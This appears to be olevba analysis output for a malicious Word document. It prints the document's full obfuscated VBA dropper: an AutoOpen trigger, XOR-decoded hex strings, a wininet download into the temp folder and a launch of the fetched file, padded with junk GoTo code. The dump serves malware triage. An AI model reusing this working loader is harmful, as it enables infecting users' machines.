Malicious Word macro

olevba 0.25 - http://decalage.info/python/oletools
Flags       Filename
----------- -----------------------------------------------------------------
OLE:MASIHB- nwncon~1.doc

(Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)

===============================================================================
FILE: nwncon~1.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: nwncon~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub autoopen()
vsvsvsaaaa110I
End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+----------+----------+---------------------------------------+
| Type     | Keyword  | Description                           |
+----------+----------+---------------------------------------+
| AutoExec | AutoOpen | Runs when the Word document is opened |
+----------+----------+---------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module4.bas
in file: nwncon~1.doc - OLE stream: u'Macros/VBA/Module4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Sub RIV3333gO()
GoTo wefwefwefweaafewf
wefwefwefweaafewf:
GoTo RERee33EGsssssgvfrgrg
RERee33EGsssssgvfrgrg:
GoTo EN299NEIKISKKKK7
EN299NEIKISKKKK7:
GoTo EN785NEIKISKKKK71
EN785NEIKISKKKK71:
GoTo ENNE435534IKISKKKK72
ENNE435534IKISKKKK72:
GoTo ULLL333LLAKhhwshefg
ULLL333LLAKhhwshefg:

End Sub
Public Function memak8of(acascasc22 As String, ghdhdhe8 As String) As String
    Dim asasas1 As Long
    Dim asasas1O As String
    Dim asasas10 As Integer

    Dim efefe332d As Integer
For efefe332d = 0 To 0
If efefe332d = 25 Then End
Next efefe332d

    Dim asasas101 As Integer

    For asasas1 = 1 To (Len(ghdhdhe8) / 2)
        asasas10 = Val("&H" & (Mid$(ghdhdhe8, (2 * asasas1) - 1, 2)))
        asasas101 = Asc(Mid$(acascasc22, ((asasas1 Mod Len(acascasc22)) + 1), 1))
        Dim dwww343a As Integer
        For dwww343a = 0 To 0
        If dwww343a = 4 Then End
        Next dwww343a
        asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
         Dim efe33q299 As Integer
        For efe33q299 = 0 To 0
        If efe33q299 = 4 Then End
        Next efe33q299
    Next asasas1
   memak8of = asasas1O
End Function

Private Sub IHYbeffeVuJC()
GoTo asefawf3
asefawf3:
GoTo sgr467gfh
sgr467gfh:
GoTo d45854shfhfshf
d45854shfhfshf:
GoTo rhhrshrsth455
rhhrshrsth455:
GoTo uykoEuxdddd
uykoEuxdddd:
GoTo rVTBqKcccccArFPEEEEEyylmMVi
rVTBqKcccccArFPEEEEEyylmMVi:
GoTo IhzKeee2ascfacas2zw
IhzKeee2ascfacas2zw:
GoTo IhzKeee2svs2333zw
IhzKeee2svs2333zw:
GoTo IhzKeee223334css44zw
IhzKeee223334css44zw:

End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+-------------+-----------------------------------------+
| Type       | Keyword     | Description                             |
+------------+-------------+-----------------------------------------+
| Suspicious | Chr         | May attempt to obfuscate specific       |
|            |             | strings                                 |
| Suspicious | Xor         | May attempt to obfuscate specific       |
|            |             | strings                                 |
| Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
|            |             | be used to obfuscate strings (option    |
|            |             | --decode to see all)                    |
+------------+-------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module11.bas
in file: nwncon~1.doc - OLE stream: u'Macros/VBA/Module11'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Sub RIVgO()
GoTo myMuLxBcPMGZVtOntBESoqzJEi
myMuLxBcPMGZVtOntBESoqzJEi:
GoTo kDxnSccbgQJQvIHYbeuJCmUQrTZmwRfSEgCBd
kDxnSccbgQJQvIHYbeuJCmUQrTZmwRfSEgCBd:
GoTo NRsSeqnJfEwsDUkFsCaUyAhAG
NRsSeqnJfEwsDUkFsCaUyAhAG:
GoTo jstrwTahLZYosuLbSDlnHk
jstrwTahLZYosuLbSDlnHk:
GoTo zivUUwERtNsQiIuoGpMwG
zivUUwERtNsQiIuoGpMwG:
GoTo UlAHJSqlOQxDQfT
UlAHJSqlOQxDQfT:

End Sub
Private Sub vuykqyOpo()
GoTo NrVTBqKAr
NrVTBqKAr:
GoTo yylmMViKeIhzKzwqIFMQdZlBwyHfL
yylmMViKeIhzKzwqIFMQdZlBwyHfL:
GoTo msLTIokkjoZRZD
msLTIokkjoZRZD:
GoTo gjmeCgKuqfzqguEnn
gjmeCgKuqfzqguEnn:
GoTo oKQlSkVaAolfxuRnL
oKQlSkVaAolfxuRnL:

End Sub
Public Function adrMOYidGVoIc()
GoTo AzEpipThgwzCu
AzEpipThgwzCu:
GoTo bKtvPsx
bKtvPsx:
GoTo qDrdEbaBjAmqQqBvNLi
qDrdEbaBjAmqQqBvNLi:
GoTo UQctH
UQctH:
GoTo bytQYEZemcHQRPUsyF
bytQYEZemcHQRPUsyF:
GoTo wMPSKkyrcJLg
wMPSKkyrcJLg:
GoTo bYGTttUdqRmQpGhHS
bYGTttUdqRmQpGhHS:

End Function
Public Function Nk3Tflh()
GoTo irOJnpV
irOJnpV:
GoTo DsYTTRQIOVn
DsYTTRQIOVn:
GoTo dSVNmPusaOjZPeoQQ
dSVNmPusaOjZPeoQQ:
GoTo luGiChFYjYUOheBl
luGiChFYjYUOheBl:
GoTo xJabwyHfLpFms
xJabwyHfLpFms:
GoTo IokkjoZRZDePgjmeCgK
IokkjoZRZDePgjmeCgK:
GoTo fzqguEnnaM
fzqguEnnaM:

End Function
Private Function QlSkVaAo85668lfxu()

End Function
Public Function Nad121112rMOYidGVoI6c()
GoTo AzEpipThgwzCuibKtvPsxKUqDrdEbaBj
AzEpipThgwzCuibKtvPsxKUqDrdEbaBj:
GoTo qQqBvNLi
qQqBvNLi:
GoTo UQctHQbytQY
UQctHQbytQY:
GoTo GTttUdqRmQpGhHSMfNkT
GTttUdqRmQpGhHSMfNkT:
GoTo hsJZgirO
hsJZgirO:

End Function
Public Function psvssqqqqqqY()
GoTo PoePoePPP
PoePoePPP:
GoTo IokkjoKKLHHnaM
IokkjoKKLHHnaM:
GoTo QlSkVSsSMmnMxuRnLR
QlSkVSsSMmnMxuRnLR:
GoTo ssssscaaaa
ssssscaaaa:
GoTo GAAAAFFFFFc
GAAAAFFFFFc:
GoTo rA09181hgwzCuS
rA09181hgwzCuS:
GoTo KtvPs
KtvPs:

End Function
Private Function UqD34343434rdEbaBjAm()

End Function
Private Function vNLigbrgrgRH8856H()

End Function
Public Sub tQY34cHQ()

End Sub
Public Function y5000S()
GoTo cJLg6666sssssNbYGT
cJLg6666sssssNbYGT:
GoTo UdS334y5y5pGhHS
UdS334y5y5pGhHS:
GoTo NkTflaaAAa5555JZgirOJnpV
NkTflaaAAa5555JZgirOJnpV:

End Function
Public Function DsYTTRQIO()

End Function
Public Function vssvsef3wtg3gxfvx()
GoTo sdssssaas
sdssssaas:
GoTo sdvsS54738EG
sdvsS54738EG:
GoTo oZRZD44444eP
oZRZD44444eP:
GoTo meCvvvvvvgKuqf
meCvvvvvvgKuqf:

End Function


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+-------------+-----------------------------------------+
| Type       | Keyword     | Description                             |
+------------+-------------+-----------------------------------------+
| Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
|            |             | be used to obfuscate strings (option    |
|            |             | --decode to see all)                    |
+------------+-------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module3.bas
in file: nwncon~1.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Option Explicit

#If VBA7 And Win64 Then
Private Declare PtrSafe Function figal1221 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
Private Declare PtrSafe Function lastSm23 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
Private Declare PtrSafe Function feefeROZ Lib "wininet.dll" Alias "InternetReadFile" (ByVal hFile As LongPtr, ByVal sBuff As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Private Declare PtrSafe Function hlopa3r3 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
#Else
Private Declare Function figal1221 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
Private Declare Function lastSm23 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Private Declare Function feefeROZ Lib "wininet.dll" Alias "InternetReadFile" (ByVal hFile As Long, ByVal sBuff As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Private Declare Function hlopa3r3 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
#End If

Private Const MBL = 8162
Private Const AAN As String = "Mod2"
Private Const IOTD = 1
Private Const IFNCW = &H4000000
Public Function LopapunTIK1(ByVal sURL As String, ByVal sFileName As String) As Boolean
    #If VBA7 And Win64 Then
        Dim hOpen As LongPtr, hFile As LongPtr
    #Else
        Dim hOpen As Long, hFile As Long
    #End If
    Dim Ret As Long
    Dim sBuff As String * MBL, sData As String
    Dim iFile As Integer, dData As Double
    hOpen = lastSm23(AAN, IOTD, vbNullString, vbNullString, 0)
    If hOpen = 0 Then
        Exit Function
    End If
    hFile = hlopa3r3(hOpen, sURL, vbNullString, 0, IFNCW, 0)
    If hFile = 0 Then
        dData = 0
    Else
        feefeROZ hFile, sBuff, MBL, Ret
        sData = sBuff
        Do While Ret <> 0
            feefeROZ hFile, sBuff, MBL, Ret
            sData = sData + Mid(sBuff, 1, Ret)
        Loop
        dData = Len(sData): iFile = FreeFile
        Open sFileName For Binary Access Write Lock Write As #iFile
        Put #iFile, , sData: Close #iFile
    End If
    figal1221 hFile
    figal1221 hOpen
    sData = ""
    If dData Then
        LopapunTIK1 = True
    End If
End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| Suspicious | Lib            | May run code from a DLL                 |
| Suspicious | Open           | May open a file                         |
| Suspicious | Write          | May write to a file (if combined with   |
|            |                | Open)                                   |
| Suspicious | Put            | May write to a file (if combined with   |
|            |                | Open)                                   |
| Suspicious | Binary         | May read or write a binary file (if     |
|            |                | combined with Open)                     |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
| IOC        | wininet.dll    | Executable file name                    |
+------------+----------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO UserForm1.frm
in file: nwncon~1.doc - OLE stream: u'Macros/VBA/UserForm1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class1.cls
in file: nwncon~1.doc - OLE stream: u'Macros/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: nwncon~1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module2.bas
in file: nwncon~1.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Const GRxvSG = "300C061F0F5D2717061F0C1503370A0B0D"
Private Const jryj = "3F1E02180A1F090A4E454B131A26"
Private Const sdioph34 = "0B101703595C49171B1E040409374D00065C090049051F1D4B131A26"
Private Const Mcdsef42 = "3007111A13070F09115D231F0E26301D1007061E29051C160602"
Private Const vjf788eS = "Ccdcscsfgvsevb"


Sub vsvsvsaaaa110I()
Dim FSOOO2
Dim sder53dfbhRF As Integer
For sder53dfbhRF = 0 To 0
If sder53dfbhRF = 5 Then End
Next sder53dfbhRF
Set FSOOO2 = CreateObject(memak8of(vjf788eS, Mcdsef42))
Dim fffffF
Const fffffFID = 2
Dim DdDd22A As Integer
For DdDd22A = 0 To 0
If DdDd22A = 5 Then End
Next DdDd22A
Set fffffF = FSOOO2.GetSpecialFolder(fffffFID)
Dim Ee11 As Integer
For Ee11 = 0 To 0
If Ee11 = 5 Then End
Next Ee11
EdEdE111 = fffffF & memak8of(vjf788eS, jryj)
Dim sil3489df As Integer
For sil3489df = 0 To 0
If sil3489df = 5 Then End
Next sil3489df
Set FSObject2 = CreateObject(memak8of(vjf788eS, Mcdsef42))
Dim seswwwsa As Integer
For seswwwsa = 0 To 0
If seswwwsa = 5 Then End
Next seswwwsa
If FSObject2.FileExists(EdEdE111) Then
FSObject2.DeleteFile EdEdE111
End If
If LopapunTIK1(memak8of(vjf788eS, sdioph34), EdEdE111) Then
End If
Set SSSS = Nothing
If FSObject2.FileExists(EdEdE111) Then
End If
Set SASASA = CreateObject(memak8of(vjf788eS, GRxvSG))
SASASA.Open EdEdE111
End Sub


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+--------------+-----------------------------------------+
| Type       | Keyword      | Description                             |
+------------+--------------+-----------------------------------------+
| Suspicious | CreateObject | May create an OLE object                |
| Suspicious | Open         | May open a file                         |
| Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
|            |              | be used to obfuscate strings (option    |
|            |              | --decode to see all)                    |
+------------+--------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module5.bas
in file: nwncon~1.doc - OLE stream: u'Macros/VBA/Module5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Public Sub PkD4040Sccbg()

End Sub
Private Sub IHYbe505VuJC()
GoTo TZmwR230fSEgCdKcNRsSeYqnJf
TZmwR230fSEgCdKcNRsSeYqnJf:
GoTo sDUk444FsCaUyA
sDUk444FsCaUyA:
GoTo GODjstrwT6904lnHkpCzivUUw
GODjstrwT6904lnHkpCzivUUw:
GoTo tNsQiIjuoGp873Tz
tNsQiIjuoGp873Tz:
GoTo uykqyO888855poEux
uykqyO888855poEux:
GoTo rVTBqKAr357FPyylmMVi
rVTBqKAr357FPyylmMVi:
GoTo IhzK4444zw
IhzK4444zw:
GoTo FdMQdZlB0258CYajGoQNTnvkPL
FdMQdZlB0258CYajGoQNTnvkPL:
GoTo PAtAfFrPpPpHKNFeHmVR
PAtAfFrPpPpHKNFeHmVR:

End Sub
Private Sub RIV1541414gO()
GoTo myMuLsaaaESoqzJEi
myMuLsaaaESoqzJEi:
GoTo kDxnScceeeeeCmUQrTZmwRfSEgCBd
kDxnScceeeeeCmUQrTZmwRfSEgCBd:
GoTo NRsSeqnaaaaaJfEwsDUkFsCaUyAhAG
NRsSeqnaaaaaJfEwsDUkFsCaUyAhAG:
GoTo jstrwT2352525ahLZYosuLbSDlnHk
jstrwT2352525ahLZYosuLbSDlnHk:
GoTo zivUUw44oGpMwG
zivUUw44oGpMwG:
GoTo UlAHJS444444qlOQxDQfT
UlAHJS444444qlOQxDQfT:

End Sub
Private Sub vuyk111111qyOpo()
GoTo NrV1010TBqKAr
NrV1010TBqKAr:
GoTo yylmMVi6464KeIhzKzwqIFMQdZlBwyHfL
yylmMVi6464KeIhzKzwqIFMQdZlBwyHfL:
GoTo msLTIok444kjoZRZD
msLTIok444kjoZRZD:
GoTo gjmeCgKu555qfzqguEnn
gjmeCgKu555qfzqguEnn:
GoTo oKQlSkVaA768olfxuRnL
oKQlSkVaA768olfxuRnL:

End Sub
Public Function adrMOY7777idGVoIc()
GoTo AzEpipThgwsdve4zCu
AzEpipThgwsdve4zCu:
GoTo bKtv4444Psx
bKtv4444Psx:
GoTo qDrdEbaBj534745674AmqQqBvNLi
qDrdEbaBj534745674AmqQqBvNLi:
GoTo UQct874H
UQct874H:
GoTo bytQYE0990099ZemcHQRPUsyF
bytQYE0990099ZemcHQRPUsyF:
GoTo wMPSKk333yrcJLg
wMPSKk333yrcJLg:
GoTo bYG23232TttUdqRmQpGhHS
bYG23232TttUdqRmQpGhHS:

End Function
Public Function Nk3121212Tflh()
GoTo irO5789JnpV
irO5789JnpV:
GoTo DsYTTR3333QIOVn
DsYTTR3333QIOVn:
GoTo dSVNmPusa565656OjZPeoQQ
dSVNmPusa565656OjZPeoQQ:
GoTo luGiChFYjYUO99999heBl
luGiChFYjYUO99999heBl:
GoTo xJabwyHfLpF66666ms
xJabwyHfLpF66666ms:
GoTo Io44kkjoZRZDePgj54meCgK
Io44kkjoZRZDePgj54meCgK:
GoTo fz343333222MMMaM
fz343333222MMMaM:

End Function
Private Function QlSkGhHHGgglfxu()

End Function
Public Function psvssEEEqqqqqqY()
GoTo PoeP001199PPP
PoeP001199PPP:
GoTo OPDK333339ja
OPDK333339ja:
GoTo JabwyU444444IOTYhFms
JabwyU444444IOTYhFms:
GoTo IokkjoKKLHH55555naM
IokkjoKKLHH55555naM:
GoTo QlSkVSsSM66666mnMxuRnLR
QlSkVSsSM66666mnMxuRnLR:
GoTo s77777sssscaaaa
s77777sssscaaaa:
GoTo GAAAAFFFFFc
GAAAAFFFFFc:
GoTo rA09181hg88888wzCuS
rA09181hg88888wzCuS:
GoTo KtvP999999s
KtvP999999s:

End Function
Private Function UqD34343000000dEbaBjAm()

End Function
Private Function vNLigbrg1010108856H()

End Function
Public Sub tQY34212121cHQ()

End Sub
Public Function y5012121200S()
GoTo cJLg666wewEEENbYGT
cJLg666wewEEENbYGT:
GoTo UdSWRRrrRRTT5y5pGhHS
UdSWRRrrRRTT5y5pGhHS:
GoTo NkTflaaAAaYyYyYyJnpV
NkTflaaAAaYyYyYyJnpV:

End Function
Public Function DsYT3332222TRQIO()

End Function
Public Function vssvs234567gxfvx()
GoTo sdsssNnNnsaas
sdsssNnNnsaas:
GoTo sdvsS5KkKk4738EG
sdvsS5KkKk4738EG:
GoTo oZRZD44UuUuUu444eP
oZRZD44UuUuUu444eP:
GoTo meCvvvvvvgKuqf
meCvvvvvvgKuqf:

End Function

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+-------------+-----------------------------------------+
| Type       | Keyword     | Description                             |
+------------+-------------+-----------------------------------------+
| Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
|            |             | be used to obfuscate strings (option    |
|            |             | --decode to see all)                    |
+------------+-------------+-----------------------------------------+